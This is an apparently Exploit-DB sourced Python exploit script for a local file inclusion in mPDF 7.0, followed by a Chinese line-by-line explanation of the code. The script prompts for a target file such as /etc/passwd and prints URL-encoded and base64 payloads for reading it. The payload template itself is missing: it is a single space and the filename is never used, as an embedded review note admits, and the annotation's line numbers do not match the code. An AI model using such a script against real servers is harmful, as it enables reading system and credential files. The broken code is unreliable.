# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A
#!/usr/bin/env python3
from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode
class Terminal(Cmd):
    """Minimal interactive loop built on cmd.Cmd.

    Every line the user types is treated as a filename and forwarded to
    payload_gen; no do_* commands are defined, so all input reaches
    default().
    """

    # Shown before each read; the leading newline separates it from the
    # previous block of output.
    prompt = "\nFile >> "

    def default(self, args):
        """Handle any line that is not a registered command.

        cmd.Cmd invokes this for unrecognised input; here the raw line is
        the filename handed to payload_gen. Returns None so the loop keeps
        running.
        """
        return payload_gen(args)
def banner():
    """Print the ASCII-art banner to stdout.

    The art is kept in a raw string so the backslashes are emitted
    literally; the text contains no valid escape sequences, so this is
    byte-identical to the non-raw form.
    """
    art = r""" _____ _____ ______ ______ ___ __ __ _ _ _
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|
| |
|_| """
    print(art)
def payload_gen(fname):
    """Print the template URL-encoded, then base64 of that encoding.

    Args:
        fname: filename typed by the user. NOTE(review): as published here
            the template literal is a single space and *fname* is never
            interpolated, so the printed output does not depend on it —
            the original template text appears to have been lost; confirm
            against the upstream listing before relying on this output.

    Returns:
        None; all results go to stdout.
    """
    template = f' '
    url_form = quote(template)
    # b64encode needs bytes, so the URL-encoded str is encoded first and
    # the result decoded back for printing.
    b64_form = b64encode(url_form.encode()).decode()
    print("[+] Replace the content with the payload below")
    print(f"Url encoded payload:\n{url_form}\n")
    print(f"Base64 encoded payload:\n{b64_form}\n")
if __name__ == "__main__":
    # Show the banner and a usage hint, then hand control to the
    # interactive loop, which runs until cmd.Cmd stops it.
    banner()
    print("Enter Filename eg. /etc/passwd")
    Terminal().cmdloop()
line13:from urllib.parse import quote
quote函数的作用是将字符串中的某些特殊字符替换为%XX的形式
按照标准,URL只允许一部分ASCII字符,其他字符(如汉字)是不符合标准的,就要进行编码
line14:from cmd import Cmd
cmd模块是一个简易的命令行解析框架,可以创建简易的命令行解析器
line17:class Terminal(Cmd)
创建类并且继承了cmd.Cmd
line19-20:
default 方法继承自 cmd.Cmd,需要由用户重写;当解析器无法识别输入的命令时会调用该方法,此处用它调用 payload_gen() 函数
line21-30:
花式banner信息
line31-38:
在字符串变量中定义payload变量,随后使用quote()函数做特殊字符的URL编码,然后再对字符串使用encode()将字符串从str类型转换成bytes类型。再然后使用b64encode做base64编码
line39-43:
主函数中关键是代码terminal.cmdloop(),这是cmd.Cmd模块中的方法,用于让命令行一直循环不退出。
参考链接:
https://blog.csdn.net/lucky404/article/details/79402478
https://www.exploit-db.com/exploits/50995